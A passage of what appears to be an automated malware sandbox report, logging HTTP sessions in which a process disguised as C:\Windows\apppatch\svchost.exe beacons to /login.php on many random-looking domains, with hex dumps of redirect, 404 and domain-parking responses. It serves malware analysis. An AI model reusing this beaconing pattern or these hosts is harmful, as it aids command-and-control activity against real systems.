                                                                                                                                                                                                            21192.168.2.455359103.150.11.230807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.617624998 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.540987968 CEST402INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://47.103.150.18:8001/dh/147287063_35134.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                            Sep 8, 2024 08:59:51.962636948 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
                                                                                                                                                                                                            Sep 8, 2024 08:59:52.350522995 CEST402INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:52 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://47.103.150.18:8001/dh/147287063_35134.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            22192.168.2.45536247.103.150.188001
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.559263945 CEST288OUTGET /dh/147287063_35134.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 47.103.150.18:8001
                                                                                                                                                                                                            Connection: Keep-Alive


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            23192.168.2.45537847.103.150.1880017524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:52.357110977 CEST288OUTGET /dh/147287063_35134.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 47.103.150.18:8001
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.327996016 CEST722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:56 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            24192.168.2.45150764.225.91.73807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.401706934 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galynuh.com
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.990678072 CEST816INHTTP/1.1 200 OK
                                                                                                                                                                                                            server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 06:59:56 GMT
                                                                                                                                                                                                            content-type: text/html
                                                                                                                                                                                                            content-length: 593
                                                                                                                                                                                                            last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                            etag: "63f68860-251"
                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            25192.168.2.45150844.221.84.105807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.964843988 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyciz.com
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.467156887 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:57 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=4b59f75789357f8e536e88e3c3065a3a|8.46.123.33|1725778797|1725778797|0|1|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            26192.168.2.45150915.197.240.20807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.966459990 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qexyhuv.com
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.467202902 CEST259INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:57 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 114
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            27192.168.2.451510103.224.182.252807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.973776102 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vofycot.com
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.594935894 CEST338INHTTP/1.1 302 Found
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 06:59:57 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            set-cookie: __tad=1725778797.6242731; expires=Wed, 06-Sep-2034 06:59:57 GMT; Max-Age=315360000
                                                                                                                                                                                                            location: http://ww16.vofycot.com/login.php?sub1=20240908-1659-57ee-a0d6-041620171ba1
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            28192.168.2.451511154.85.183.50807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.980659008 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.848315001 CEST307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:57 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.849725008 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.262165070 CEST307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:57 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            29192.168.2.451512103.224.212.108807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.990817070 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyxynyx.com
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.579420090 CEST340INHTTP/1.1 302 Found
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 06:59:57 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            set-cookie: __tad=1725778797.8172407; expires=Wed, 06-Sep-2034 06:59:57 GMT; Max-Age=315360000
                                                                                                                                                                                                            location: http://ww25.lyxynyx.com/login.php?subid1=20240908-1659-57be-bb39-c8c798adf2d1
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            30192.168.2.45151364.190.63.136807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.812057972 CEST348OUTGET /login.php?sub1=20240908-1659-57ee-a0d6-041620171ba1 HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww16.vofycot.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1725778797.6242731
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507297993 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 06:59:58 GMT
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            transfer-encoding: chunked
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_ElUYGsLu9UKFW47RKUe0CTK1WrvFuX/NwmH6eM8xn7hgPtKqtsiHuZBx1t3iixaHNThxji7h9S3M9e1a4ZHdqg==
                                                                                                                                                                                                            last-modified: Sun, 08 Sep 2024 06:59:58 GMT
                                                                                                                                                                                                            x-cache-miss-from: parking-7768d5b45d-rblrk
                                                                                                                                                                                                            server: Parking/1.0
                                                                                                                                                                                                            Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 45 6c 55 59 47 73 4c 75 39 55 4b 46 57 34 37 52 4b 55 65 30 43 54 4b 31 57 72 76 46 75 58 2f 4e 77 6d 48 36 65 4d 38 78 6e 37 68 67 50 74 4b 71 74 73 69 48 75 5a 42 78 31 74 33 69 69 78 61 48 4e 54 68 78 6a 69 37 68 39 53 33 4d 39 65 31 61 34 5a 48 64 71 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_ElUYGsLu9UKFW47RKUe0CTK1WrvFuX/NwmH6eM8xn7hgPtKqtsiHuZBx1t3iixaHNThxji7h9S3M9e1a4ZHdqg==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507324934 CEST1236INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                            Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com h25as it all. We hope you find what you 20BEare searching for!"><link rel="icon" t
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507343054 CEST1236INData Raw: 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79
                                                                                                                                                                                                            Data Ascii: eo{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflo
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507354021 CEST1236INData Raw: 61 6e 63 65 3a 62 75 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76
                                                                                                                                                                                                            Data Ascii: ance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:linear-gradient(108.57deg, #141E30 0%, #243B55 0%);text-align:center
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507364988 CEST1236INData Raw: 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72
                                                                                                                                                                                                            Data Ascii: claimer__content-text,.container-disclaimer a{font-size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.contain
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507375956 CEST1236INData Raw: 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 74 65 78 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f
                                                                                                                                                                                                            Data Ascii: ookie-message__content-interactive-text{margin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507386923 CEST1236INData Raw: 6f 6e 74 2d 73 69 7a 65 3a 78 2d 6c 61 72 67 65 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f
                                                                                                                                                                                                            Data Ascii: ont-size:x-large}.btn--success-sm{background-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c
